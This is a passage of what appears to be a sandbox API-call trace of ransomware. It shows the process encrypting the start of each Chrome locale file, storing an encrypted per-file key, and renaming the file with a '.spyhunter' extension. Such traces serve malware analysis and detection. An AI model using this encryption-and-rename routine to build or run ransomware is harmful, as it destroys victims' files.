lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0176.336] WriteFile (in: hFile=0x9c, lpBuffer=0x57e4fc*, nNumberOfBytesToWrite=0x4, lpNumberOfBytesWritten=0x57e4bc, lpOverlapped=0x0 | out: lpBuffer=0x57e4fc*, lpNumberOfBytesWritten=0x57e4bc*=0x4, lpOverlapped=0x0) returned 1 [0176.356] WriteFile (in: hFile=0x9c, lpBuffer=0x31f098*, nNumberOfBytesToWrite=0x30, lpNumberOfBytesWritten=0x57e4bc, lpOverlapped=0x0 | out: lpBuffer=0x31f098*, lpNumberOfBytesWritten=0x57e4bc*=0x30, lpOverlapped=0x0) returned 1 [0176.357] CloseHandle (hObject=0x9c) returned 1 [0176.357] GetProcessHeap () returned 0x2c0000 [0176.357] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x1003e) returned 0x2fb1c8 [0176.357] wnsprintfW (in: pszDest=0x2fb1c8, cchDest=32767, pszFmt="%s%s" | out: pszDest="\\\\?\\C:\\Program Files (x86)\\Google\\Chrome\\Application\\58.0.3029.110\\Locales\\kn.pak.spyhunter") returned 91 [0176.357] MoveFileW (lpExistingFileName="\\\\?\\C:\\Program Files (x86)\\Google\\Chrome\\Application\\58.0.3029.110\\Locales\\kn.pak" (normalized: "c:\\program files (x86)\\google\\chrome\\application\\58.0.3029.110\\locales\\kn.pak"), lpNewFileName="\\\\?\\C:\\Program Files (x86)\\Google\\Chrome\\Application\\58.0.3029.110\\Locales\\kn.pak.spyhunter" (normalized: "c:\\program files (x86)\\google\\chrome\\application\\58.0.3029.110\\locales\\kn.pak.spyhunter")) returned 1 [0176.358] GetProcessHeap () returned 0x2c0000 [0176.358] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2fb1c8 | out: hHeap=0x2c0000) returned 1 [0176.358] GetProcessHeap () returned 0x2c0000 [0176.358] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x31f098 | out: hHeap=0x2c0000) returned 1 [0176.358] GetProcessHeap () returned 0x2c0000 [0176.358] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ecd190 | out: hHeap=0x2c0000) returned 1 [0176.359] CryptGenRandom (in: hProv=0x2d5df8, dwLen=0x20, pbBuffer=0x57e4f8 | out: pbBuffer=0x57e4f8) returned 1 [0176.359] GetProcessHeap () returned 0x2c0000 [0176.359] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x70) returned 0x31f098 [0176.359] CryptEncrypt (in: hKey=0x2d4db8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x31f098*, pdwDataLen=0x57e4f0*=0x20, dwBufLen=0x30 | out: pbData=0x31f098*, pdwDataLen=0x57e4f0*=0x30) returned 1 [0176.359] CreateFileW (lpFileName="\\\\?\\C:\\Program Files (x86)\\Google\\Chrome\\Application\\58.0.3029.110\\Locales\\id.pak" (normalized: "c:\\program files (x86)\\google\\chrome\\application\\58.0.3029.110\\locales\\id.pak"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x9c [0176.360] lstrlenW (lpString="\\\\?\\C:\\Program Files (x86)\\Google\\Chrome\\Application\\58.0.3029.110\\Locales\\id.pak") returned 81 [0176.360] StrStrW (lpFirst="id.pak", lpSrch=".txt") returned 0x0 [0176.360] GetProcessHeap () returned 0x2c0000 [0176.360] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x2840) returned 0x2c321c8 [0176.360] ReadFile (in: hFile=0x9c, lpBuffer=0x2c321c8, nNumberOfBytesToRead=0x2800, lpNumberOfBytesRead=0x57e4b4, lpOverlapped=0x0 | out: lpBuffer=0x2c321c8*, lpNumberOfBytesRead=0x57e4b4*=0x2800, lpOverlapped=0x0) returned 1 [0176.371] SetFilePointerEx (in: hFile=0x9c, liDistanceToMove=0xffffd800, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0176.371] WriteFile (in: hFile=0x9c, lpBuffer=0x2c321c8*, nNumberOfBytesToWrite=0x2800, lpNumberOfBytesWritten=0x57e4b4, lpOverlapped=0x0 | out: lpBuffer=0x2c321c8*, lpNumberOfBytesWritten=0x57e4b4*=0x2800, lpOverlapped=0x0) returned 1 [0176.371] GetProcessHeap () returned 0x2c0000 [0176.371] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2c321c8 | out: hHeap=0x2c0000) returned 1 [0176.371] SetFilePointerEx (in: hFile=0x9c, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0176.372] WriteFile (in: hFile=0x9c, lpBuffer=0x57e4f4*, nNumberOfBytesToWrite=0x4, lpNumberOfBytesWritten=0x57e4b4, lpOverlapped=0x0 | out: lpBuffer=0x57e4f4*, lpNumberOfBytesWritten=0x57e4b4*=0x4, lpOverlapped=0x0) returned 1 [0176.383] WriteFile (in: hFile=0x9c, lpBuffer=0x31f098*, nNumberOfBytesToWrite=0x30, lpNumberOfBytesWritten=0x57e4b4, lpOverlapped=0x0 | out: lpBuffer=0x31f098*, lpNumberOfBytesWritten=0x57e4b4*=0x30, lpOverlapped=0x0) returned 1 [0176.383] CloseHandle (hObject=0x9c) returned 1 [0176.383] GetProcessHeap () returned 0x2c0000 [0176.383] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x1003e) returned 0x2fb1c8 [0176.384] wnsprintfW (in: pszDest=0x2fb1c8, cchDest=32767, pszFmt="%s%s" | out: pszDest="\\\\?\\C:\\Program Files (x86)\\Google\\Chrome\\Application\\58.0.3029.110\\Locales\\id.pak.spyhunter") returned 91 [0176.384] MoveFileW (lpExistingFileName="\\\\?\\C:\\Program Files (x86)\\Google\\Chrome\\Application\\58.0.3029.110\\Locales\\id.pak" (normalized: "c:\\program files (x86)\\google\\chrome\\application\\58.0.3029.110\\locales\\id.pak"), lpNewFileName="\\\\?\\C:\\Program Files (x86)\\Google\\Chrome\\Application\\58.0.3029.110\\Locales\\id.pak.spyhunter" (normalized: "c:\\program files (x86)\\google\\chrome\\application\\58.0.3029.110\\locales\\id.pak.spyhunter")) returned 1 [0176.385] GetProcessHeap () returned 0x2c0000 [0176.385] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2fb1c8 | out: hHeap=0x2c0000) returned 1 [0176.385] GetProcessHeap () returned 0x2c0000 [0176.386] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x31f098 | out: hHeap=0x2c0000) returned 1 [0176.393] GetProcessHeap () returned 0x2c0000 [0176.393] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2eccec0 | out: hHeap=0x2c0000) returned 1 [0176.393] CryptGenRandom (in: hProv=0x2d5df8, dwLen=0x20, pbBuffer=0x57e4f8 | out: pbBuffer=0x57e4f8) returned 1 [0176.393] GetProcessHeap () returned 0x2c0000 [0176.393] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x70) returned 0x31f098 [0176.393] CryptEncrypt (in: hKey=0x2d4db8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x31f098*, pdwDataLen=0x57e4f0*=0x20, dwBufLen=0x30 | out: pbData=0x31f098*, pdwDataLen=0x57e4f0*=0x30) returned 1 [0176.394] CreateFileW (lpFileName="\\\\?\\C:\\Program Files (x86)\\Google\\Chrome\\Application\\58.0.3029.110\\Locales\\hi.pak" (normalized: "c:\\program files (x86)\\google\\chrome\\application\\58.0.3029.110\\locales\\hi.pak"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x9c [0176.395] lstrlenW (lpString="\\\\?\\C:\\Program Files (x86)\\Google\\Chrome\\Application\\58.0.3029.110\\Locales\\hi.pak") returned 81 [0176.395] StrStrW (lpFirst="hi.pak", lpSrch=".txt") returned 0x0 [0176.395] GetProcessHeap () returned 0x2c0000 [0176.395] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x2840) returned 0x2c321c8 [0176.395] ReadFile (in: hFile=0x9c, lpBuffer=0x2c321c8, nNumberOfBytesToRead=0x2800, lpNumberOfBytesRead=0x57e4b4, lpOverlapped=0x0 | out: lpBuffer=0x2c321c8*, lpNumberOfBytesRead=0x57e4b4*=0x2800, lpOverlapped=0x0) returned 1 [0176.435] SetFilePointerEx (in: hFile=0x9c, liDistanceToMove=0xffffd800, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0176.435] WriteFile (in: hFile=0x9c, lpBuffer=0x2c321c8*, nNumberOfBytesToWrite=0x2800, lpNumberOfBytesWritten=0x57e4b4, lpOverlapped=0x0 | out: lpBuffer=0x2c321c8*, lpNumberOfBytesWritten=0x57e4b4*=0x2800, lpOverlapped=0x0) returned 1 [0176.436] GetProcessHeap () returned 0x2c0000 [0176.436] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2c321c8 | out: hHeap=0x2c0000) returned 1 [0176.436] SetFilePointerEx (in: hFile=0x9c, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0176.436] WriteFile (in: hFile=0x9c, lpBuffer=0x57e4f4*, nNumberOfBytesToWrite=0x4, lpNumberOfBytesWritten=0x57e4b4, lpOverlapped=0x0 | out: lpBuffer=0x57e4f4*, lpNumberOfBytesWritten=0x57e4b4*=0x4, lpOverlapped=0x0) returned 1 [0176.437] WriteFile (in: hFile=0x9c, lpBuffer=0x31f098*, nNumberOfBytesToWrite=0x30, lpNumberOfBytesWritten=0x57e4b4, lpOverlapped=0x0 | out: lpBuffer=0x31f098*, lpNumberOfBytesWritten=0x57e4b4*=0x30, lpOverlapped=0x0) returned 1 [0176.438] CloseHandle (hObject=0x9c) returned 1 [0176.438] GetProcessHeap () returned 0x2c0000 [0176.438] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x1003e) returned 0x2fb1c8 [0176.438] wnsprintfW (in: pszDest=0x2fb1c8, cchDest=32767, pszFmt="%s%s" | out: pszDest="\\\\?\\C:\\Program Files (x86)\\Google\\Chrome\\Application\\58.0.3029.110\\Locales\\hi.pak.spyhunter") returned 91 [0176.438] MoveFileW (lpExistingFileName="\\\\?\\C:\\Program Files (x86)\\Google\\Chrome\\Application\\58.0.3029.110\\Locales\\hi.pak" (normalized: "c:\\program files (x86)\\google\\chrome\\application\\58.0.3029.110\\locales\\hi.pak"), lpNewFileName="\\\\?\\C:\\Program Files (x86)\\Google\\Chrome\\Application\\58.0.3029.110\\Locales\\hi.pak.spyhunter" (normalized: "c:\\program files (x86)\\google\\chrome\\application\\58.0.3029.110\\locales\\hi.pak.spyhunter")) returned 1 [0176.439] GetProcessHeap () returned 0x2c0000 [0176.439] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2fb1c8 | out: hHeap=0x2c0000) returned 1 [0176.439] GetProcessHeap () returned 0x2c0000 [0176.439] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x31f098 | out: hHeap=0x2c0000) returned 1 [0176.439] GetProcessHeap () returned 0x2c0000 [0176.439] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2eccbf0 | out: hHeap=0x2c0000) returned 1 [0176.439] CryptGenRandom (in: hProv=0x2d5df8, dwLen=0x20, pbBuffer=0x57e4f0 | out: pbBuffer=0x57e4f0) returned 1 [0176.439] GetProcessHeap () returned 0x2c0000 [0176.439] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x70) returned 0x31f098 [0176.439] CryptEncrypt (in: hKey=0x2d4db8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x31f098*, pdwDataLen=0x57e4e8*=0x20, dwBufLen=0x30 | out: pbData=0x31f098*, pdwDataLen=0x57e4e8*=0x30) returned 1 [0176.440] CreateFileW (lpFileName="\\\\?\\C:\\Program Files (x86)\\Google\\Chrome\\Application\\58.0.3029.110\\Locales\\fi.pak" (normalized: "c:\\program files (x86)\\google\\chrome\\application\\58.0.3029.110\\locales\\fi.pak"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x9c [0176.440] lstrlenW (lpString="\\\\?\\C:\\Program Files (x86)\\Google\\Chrome\\Application\\58.0.3029.110\\Locales\\fi.pak") returned 81 [0176.440] StrStrW (lpFirst="fi.pak", lpSrch=".txt") returned 0x0 [0176.440] GetProcessHeap () returned 0x2c0000 [0176.440] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x2840) returned 0x2c321c8 [0176.440] ReadFile (in: hFile=0x9c, lpBuffer=0x2c321c8, nNumberOfBytesToRead=0x2800, lpNumberOfBytesRead=0x57e4ac, lpOverlapped=0x0 | out: lpBuffer=0x2c321c8*, lpNumberOfBytesRead=0x57e4ac*=0x2800, lpOverlapped=0x0) returned 1 [0176.450] SetFilePointerEx (in: hFile=0x9c, liDistanceToMove=0xffffd800, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0176.450] WriteFile (in: hFile=0x9c, lpBuffer=0x2c321c8*, nNumberOfBytesToWrite=0x2800, lpNumberOfBytesWritten=0x57e4ac, lpOverlapped=0x0 | out: lpBuffer=0x2c321c8*, lpNumberOfBytesWritten=0x57e4ac*=0x2800, lpOverlapped=0x0) returned 1 [0176.450] GetProcessHeap () returned 0x2c0000 [0176.450] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2c321c8 | out: hHeap=0x2c0000) returned 1 [0176.450] SetFilePointerEx (in: hFile=0x9c, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0176.451] WriteFile (in: hFile=0x9c, lpBuffer=0x57e4ec*, nNumberOfBytesToWrite=0x4, lpNumberOfBytesWritten=0x57e4ac, lpOverlapped=0x0 | out: lpBuffer=0x57e4ec*, lpNumberOfBytesWritten=0x57e4ac*=0x4, lpOverlapped=0x0) returned 1 [0176.575] WriteFile (in: hFile=0x9c, lpBuffer=0x31f098*, nNumberOfBytesToWrite=0x30, lpNumberOfBytesWritten=0x57e4ac, lpOverlapped=0x0 | out: lpBuffer=0x31f098*, lpNumberOfBytesWritten=0x57e4ac*=0x30, lpOverlapped=0x0) returned 1 [0176.575] CloseHandle (hObject=0x9c) returned 1 [0176.607] GetProcessHeap () returned 0x2c0000 [0176.607] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x1003e) returned 0x35f878 [0176.607] wnsprintfW (in: pszDest=0x35f878, cchDest=32767, pszFmt="%s%s" | out: pszDest="\\\\?\\C:\\Program Files (x86)\\Google\\Chrome\\Application\\58.0.3029.110\\Locales\\fi.pak.spyhunter") returned 91 [0176.607] MoveFileW (lpExistingFileName="\\\\?\\C:\\Program Files (x86)\\Google\\Chrome\\Application\\58.0.3029.110\\Locales\\fi.pak" (normalized: "c:\\program files (x86)\\google\\chrome\\application\\58.0.3029.110\\locales\\fi.pak"), lpNewFileName="\\\\?\\C:\\Program Files (x86)\\Google\\Chrome\\Application\\58.0.3029.110\\Locales\\fi.pak.spyhunter" (normalized: "c:\\program files (x86)\\google\\chrome\\application\\58.0.3029.110\\locales\\fi.pak.spyhunter")) returned 1 [0176.608] GetProcessHeap () returned 0x2c0000 [0176.609] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x35f878 | out: hHeap=0x2c0000) returned 1 [0176.609] GetProcessHeap () returned 0x2c0000 [0176.609] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x31f098 | out: hHeap=0x2c0000) returned 1 [0176.609] GetProcessHeap () returned 0x2c0000 [0176.609] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ecc740 | out: hHeap=0x2c0000) returned 1 [0176.609] CryptGenRandom (in: hProv=0x2d5df8, dwLen=0x20, pbBuffer=0x57e4f0 | out: pbBuffer=0x57e4f0) returned 1 [0176.609] GetProcessHeap () returned 0x2c0000 [0176.609] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x70) returned 0x31f098 [0176.609] CryptEncrypt (in: hKey=0x2d4db8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x31f098*, pdwDataLen=0x57e4e8*=0x20, dwBufLen=0x30 | out: pbData=0x31f098*, pdwDataLen=0x57e4e8*=0x30) returned 1 [0176.609] CreateFileW (lpFileName="\\\\?\\C:\\Program Files (x86)\\Google\\Chrome\\Application\\58.0.3029.110\\Locales\\es-419.pak" (normalized: "c:\\program files (x86)\\google\\chrome\\application\\58.0.3029.110\\locales\\es-419.pak"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xa0 [0176.610] lstrlenW (lpString="\\\\?\\C:\\Program Files (x86)\\Google\\Chrome\\Application\\58.0.3029.110\\Locales\\es-419.pak") returned 85 [0176.610] StrStrW (lpFirst="es-419.pak", lpSrch=".txt") returned 0x0 [0176.610] GetProcessHeap () returned 0x2c0000 [0176.610] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x2840) returned 0x2c321c8 [0176.610] ReadFile (in: hFile=0xa0, lpBuffer=0x2c321c8, nNumberOfBytesToRead=0x2800, lpNumberOfBytesRead=0x57e4ac, lpOverlapped=0x0 | out: lpBuffer=0x2c321c8*, lpNumberOfBytesRead=0x57e4ac*=0x2800, lpOverlapped=0x0) returned 1 [0176.620] SetFilePointerEx (in: hFile=0xa0, liDistanceToMove=0xffffd800, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0176.620] WriteFile (in: hFile=0xa0, lpBuffer=0x2c321c8*, nNumberOfBytesToWrite=0x2800, lpNumberOfBytesWritten=0x57e4ac, lpOverlapped=0x0 | out: lpBuffer=0x2c321c8*, lpNumberOfBytesWritten=0x57e4ac*=0x2800, lpOverlapped=0x0) returned 1 [0176.620] GetProcessHeap () returned 0x2c0000 [0176.620] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2c321c8 | out: hHeap=0x2c0000) returned 1 [0176.620] SetFilePointerEx (in: hFile=0xa0, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0176.620] WriteFile (in: hFile=0xa0, lpBuffer=0x57e4ec*, nNumberOfBytesToWrite=0x4, lpNumberOfBytesWritten=0x57e4ac, lpOverlapped=0x0 | out: lpBuffer=0x57e4ec*, lpNumberOfBytesWritten=0x57e4ac*=0x4, lpOverlapped=0x0) returned 1 [0176.623] WriteFile (in: hFile=0xa0, lpBuffer=0x31f098*, nNumberOfBytesToWrite=0x30, lpNumberOfBytesWritten=0x57e4ac, lpOverlapped=0x0 | out: lpBuffer=0x31f098*, lpNumberOfBytesWritten=0x57e4ac*=0x30, lpOverlapped=0x0) returned 1 [0176.623] CloseHandle (hObject=0xa0) returned 1 [0176.643] GetProcessHeap () returned 0x2c0000 [0176.643] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x1003e) returned 0x2fb1c8 [0176.643] wnsprintfW (in: pszDest=0x2fb1c8, cchDest=32767, pszFmt="%s%s" | out: pszDest="\\\\?\\C:\\Program Files (x86)\\Google\\Chrome\\Application\\58.0.3029.110\\Locales\\es-419.pak.spyhunter") returned 95 [0176.643] MoveFileW (lpExistingFileName="\\\\?\\C:\\Program Files (x86)\\Google\\Chrome\\Application\\58.0.3029.110\\Locales\\es-419.pak" (normalized: "c:\\program files (x86)\\google\\chrome\\application\\58.0.3029.110\\locales\\es-419.pak"), lpNewFileName="\\\\?\\C:\\Program Files (x86)\\Google\\Chrome\\Application\\58.0.3029.110\\Locales\\es-419.pak.spyhunter" (normalized: "c:\\program files (x86)\\google\\chrome\\application\\58.0.3029.110\\locales\\es-419.pak.spyhunter")) returned 1 [0176.644] GetProcessHeap () returned 0x2c0000 [0176.644] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2fb1c8 | out: hHeap=0x2c0000) returned 1 [0176.644] GetProcessHeap () returned 0x2c0000 [0176.644] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x31f098 | out: hHeap=0x2c0000) returned 1 [0176.644] GetProcessHeap () returned 0x2c0000 [0176.644] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2eca3b0 | out: hHeap=0x2c0000) returned 1 [0176.644] CryptGenRandom (in: hProv=0x2d5df8, dwLen=0x20, pbBuffer=0x57e4e8 | out: pbBuffer=0x57e4e8) returned 1 [0176.644] GetProcessHeap () returned 0x2c0000 [0176.644] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x70) returned 0x31f098 [0176.644] CryptEncrypt (in: hKey=0x2d4db8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x31f098*, pdwDataLen=0x57e4e0*=0x20, dwBufLen=0x30 | out: pbData=0x31f098*, pdwDataLen=0x57e4e0*=0x30) returned 1 [0176.644] CreateFileW (lpFileName="\\\\?\\C:\\Program Files (x86)\\Google\\Chrome\\Application\\58.0.3029.110\\Locales\\el.pak" (normalized: "c:\\program files (x86)\\google\\chrome\\application\\58.0.3029.110\\locales\\el.pak"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xa0 [0176.645] lstrlenW (lpString="\\\\?\\C:\\Program Files (x86)\\Google\\Chrome\\Application\\58.0.3029.110\\Locales\\el.pak") returned 81 [0176.645] StrStrW (lpFirst="el.pak", lpSrch=".txt") returned 0x0 [0176.645] GetProcessHeap () returned 0x2c0000 [0176.645] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x2840) returned 0x2c34bd0 [0176.645] ReadFile (in: hFile=0xa0, lpBuffer=0x2c34bd0, nNumberOfBytesToRead=0x2800, lpNumberOfBytesRead=0x57e4a4, lpOverlapped=0x0 | out: lpBuffer=0x2c34bd0*, lpNumberOfBytesRead=0x57e4a4*=0x2800, lpOverlapped=0x0) returned 1 [0176.668] SetFilePointerEx (in: hFile=0xa0, liDistanceToMove=0xffffd800, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0176.668] WriteFile (in: hFile=0xa0, lpBuffer=0x2c34bd0*, nNumberOfBytesToWrite=0x2800, lpNumberOfBytesWritten=0x57e4a4, lpOverlapped=0x0 | out: lpBuffer=0x2c34bd0*, lpNumberOfBytesWritten=0x57e4a4*=0x2800, lpOverlapped=0x0) returned 1 [0176.668] GetProcessHeap () returned 0x2c0000 [0176.668] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2c34bd0 | out: hHeap=0x2c0000) returned 1 [0176.668] SetFilePointerEx (in: hFile=0xa0, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0176.668] WriteFile (in: hFile=0xa0, lpBuffer=0x57e4e4*, nNumberOfBytesToWrite=0x4, lpNumberOfBytesWritten=0x57e4a4, lpOverlapped=0x0 | out: lpBuffer=0x57e4e4*, lpNumberOfBytesWritten=0x57e4a4*=0x4, lpOverlapped=0x0) returned 1 [0176.669] WriteFile (in: hFile=0xa0, lpBuffer=0x31f098*, nNumberOfBytesToWrite=0x30, lpNumberOfBytesWritten=0x57e4a4, lpOverlapped=0x0 | out: lpBuffer=0x31f098*, lpNumberOfBytesWritten=0x57e4a4*=0x30, lpOverlapped=0x0) returned 1 [0176.669] CloseHandle (hObject=0xa0) returned 1 [0176.670] GetProcessHeap () returned 0x2c0000 [0176.670] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x1003e) returned 0x2fb1c8 [0176.670] wnsprintfW (in: pszDest=0x2fb1c8, cchDest=32767, pszFmt="%s%s" | out: pszDest="\\\\?\\C:\\Program Files (x86)\\Google\\Chrome\\Application\\58.0.3029.110\\Locales\\el.pak.spyhunter") returned 91 [0176.670] MoveFileW (lpExistingFileName="\\\\?\\C:\\Program Files (x86)\\Google\\Chrome\\Application\\58.0.3029.110\\Locales\\el.pak" (normalized: "c:\\program files (x86)\\google\\chrome\\application\\58.0.3029.110\\locales\\el.pak"), lpNewFileName="\\\\?\\C:\\Program Files (x86)\\Google\\Chrome\\Application\\58.0.3029.110\\Locales\\el.pak.spyhunter" (normalized: "c:\\program files (x86)\\google\\chrome\\application\\58.0.3029.110\\locales\\el.pak.spyhunter")) returned 1 [0176.671] GetProcessHeap () returned 0x2c0000 [0176.671] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2fb1c8 | out: hHeap=0x2c0000) returned 1 [0176.671] GetProcessHeap () returned 0x2c0000 [0176.671] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x31f098 | out: hHeap=0x2c0000) returned 1 [0176.671] GetProcessHeap () returned 0x2c0000 [0176.671] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ecc380 | out: hHeap=0x2c0000) returned 1 [0176.671] CryptGenRandom (in: hProv=0x2d5df8, dwLen=0x20, pbBuffer=0x57e4e8 | out: pbBuffer=0x57e4e8) returned 1 [0176.671] GetProcessHeap () returned 0x2c0000 [0176.671] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x70) returned 0x31f098 [0176.671] CryptEncrypt (in: hKey=0x2d4db8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x31f098*, pdwDataLen=0x57e4e0*=0x20, dwBufLen=0x30 | out: pbData=0x31f098*, pdwDataLen=0x57e4e0*=0x30) returned 1 [0176.671] CreateFileW (lpFileName="\\\\?\\C:\\Program Files (x86)\\Google\\Chrome\\Application\\58.0.3029.110\\Locales\\da.pak" (normalized: "c:\\program files (x86)\\google\\chrome\\application\\58.0.3029.110\\locales\\da.pak"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xa0 [0176.675] lstrlenW (lpString="\\\\?\\C:\\Program Files (x86)\\Google\\Chrome\\Application\\58.0.3029.110\\Locales\\da.pak") returned 81 [0176.675] StrStrW (lpFirst="da.pak", lpSrch=".txt") returned 0x0 [0176.675] GetProcessHeap () returned 0x2c0000 [0176.675] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x2840) returned 0x2c34bd0 [0176.675] ReadFile (in: hFile=0xa0, lpBuffer=0x2c34bd0, nNumberOfBytesToRead=0x2800, lpNumberOfBytesRead=0x57e4a4, lpOverlapped=0x0 | out: lpBuffer=0x2c34bd0*, lpNumberOfBytesRead=0x57e4a4*=0x2800, lpOverlapped=0x0) returned 1 [0176.678] SetFilePointerEx (in: hFile=0xa0, liDistanceToMove=0xffffd800, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0176.678] WriteFile (in: hFile=0xa0, lpBuffer=0x2c34bd0*, nNumberOfBytesToWrite=0x2800, lpNumberOfBytesWritten=0x57e4a4, lpOverlapped=0x0 | out: lpBuffer=0x2c34bd0*, lpNumberOfBytesWritten=0x57e4a4*=0x2800, lpOverlapped=0x0) returned 1 [0176.678] GetProcessHeap () returned 0x2c0000 [0176.678] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2c34bd0 | out: hHeap=0x2c0000) returned 1 [0176.678] SetFilePointerEx (in: hFile=0xa0, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0176.678] WriteFile (in: hFile=0xa0, lpBuffer=0x57e4e4*, nNumberOfBytesToWrite=0x4, lpNumberOfBytesWritten=0x57e4a4, lpOverlapped=0x0 | out: lpBuffer=0x57e4e4*, lpNumberOfBytesWritten=0x57e4a4*=0x4, lpOverlapped=0x0) returned 1 [0176.681] WriteFile (in: hFile=0xa0, lpBuffer=0x31f098*, nNumberOfBytesToWrite=0x30, lpNumberOfBytesWritten=0x57e4a4, lpOverlapped=0x0 | out: lpBuffer=0x31f098*, lpNumberOfBytesWritten=0x57e4a4*=0x30, lpOverlapped=0x0) returned 1 [0176.681] CloseHandle (hObject=0xa0) returned 1 [0176.681] GetProcessHeap () returned 0x2c0000 [0176.681] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x1003e) returned 0x2fb1c8 [0176.681] wnsprintfW (in: pszDest=0x2fb1c8, cchDest=32767, pszFmt="%s%s" | out: pszDest="\\\\?\\C:\\Program Files (x86)\\Google\\Chrome\\Application\\58.0.3029.110\\Locales\\da.pak.spyhunter") returned 91 [0176.681] MoveFileW (lpExistingFileName="\\\\?\\C:\\Program Files (x86)\\Google\\Chrome\\Application\\58.0.3029.110\\Locales\\da.pak" (normalized: "c:\\program files (x86)\\google\\chrome\\application\\58.0.3029.110\\locales\\da.pak"), 